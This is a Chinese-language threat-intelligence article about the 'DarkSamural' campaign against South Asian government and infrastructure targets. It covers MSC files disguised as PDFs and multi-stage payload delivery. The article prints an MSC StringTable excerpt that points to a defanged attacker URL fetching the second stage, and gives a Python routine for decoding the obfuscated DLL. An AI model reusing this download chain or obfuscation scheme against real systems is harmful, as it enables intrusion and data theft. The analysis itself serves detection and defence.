安全研究人员最近几周观察到了一场针对南亚关键基础设施和政府实体的复杂攻击活动。
该攻击链被称为DarkSamural行动,利用欺骗性制作的 LNK 和 PDF 文件渗透网络、建立持久性并泄露敏感信息。
初步侦察表明,攻击者使用熟悉的 PDF 图标伪装恶意 MSC(Microsoft 管理控制台)文件,诱使收件人无意中启动嵌入的脚本。
随着攻击活动的展开,被盗的凭证和系统元数据会流回攻击者的命令和控制服务器,从而实现进一步的横向移动。
感染始于一封包含压缩文件的鱼叉式网络钓鱼邮件。收件人会收到一个名为Drone_Information.pdf[.]msc的文件,尽管该文件看起来像 PDF 文件,但双击即可执行。
Ctfiot 分析师指出,这些 MSC 文件采用 GrimResource 技术来解压并运行混淆的 JavaScript,进而下载第二阶段的有效载荷。
这种多层方法阻碍了基于签名的检测,因为每个阶段在去混淆发生之前看起来都是无害的。
研究人员发现,恶意脚本会联系远程 URL 并检索伪装的 DLL,最终将其存储起来C:\ProgramData\DismCore[.]dll以供后续执行。
从第三段可以看出,DarkSamural 的影响已经超出了最初的访问范围。
受害者报告了未经授权的文件传输、浏览器凭证盗窃甚至远程 shell 访问。
开源和专有 RAT(包括 Mythic、QuasarRat 和 BADNEWS)的组合使攻击者能够对受感染的机器进行多种控制。
收集的文件范围从行政文件到专有研究,凸显了该活动的战略重点是窃取高价值目标。
进一步分析表明,恶意 DLL 嵌入了一个导出函数DIIRegisterServer,该函数可以动态解析关键的 Windows API。
执行后,样本收集主机详细信息,例如机器名称、用户帐户和进程 ID,并将它们打包到 JSON 签入包中。
该数据包使用 AES-128-GCM 加密,并通过 WinHTTP 传输到 C2 端点。由此产生的网络伪像会模仿合法的更新流量,使异常检测变得复杂。
感染机制和混淆
仔细检查 MSC 文件的内部结构,可以发现一个旨在阻止逆向工程的多层混淆方案。
嵌入在 XML 中的初始JavaScript 代码会触发通过远程脚本引用StringTable启动的 XSL 转换。mmc[.]exe
<StringTable>
<GUID> {71E5B33E-1064-11D2-808F-0000F875A9CE} </GUID>
<Strings>
<String ID="14"> https[:]//caapakistaan[.]com/.../Unit-942-Drone-Info-MAK3[.]html </String>
</Strings>
</StringTable>获取第二层后,脚本反转字符序列、替换标记、转换为十六进制,并执行 Base64 解码以生成最终的DLL。
解码例程在 Python 中体现了这种转换:
def decode (str):
b = list (str)
c = ''[.]join (b[::-1]) [.]replace("$", "4") [.]replace ("!", "1")
d = ''[.]join ([chr (int (c [i:i+2], 16)) for i in range (0, len (c), 2)])
return base64[.]b64decode (d)随后,解码后的字节被写入磁盘并注册为 COM 服务器,确保在系统启动时执行。
这种分层混淆与计划任务创建相结合,体现了 DarkSamural 对感染和逃避的细致方法。
网络安全团队应检查 MSC 文件行为、监控异常mmc[.]exe调用并根据已知工件哈希验证基于脚本的下载,以检测和阻止此活动。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
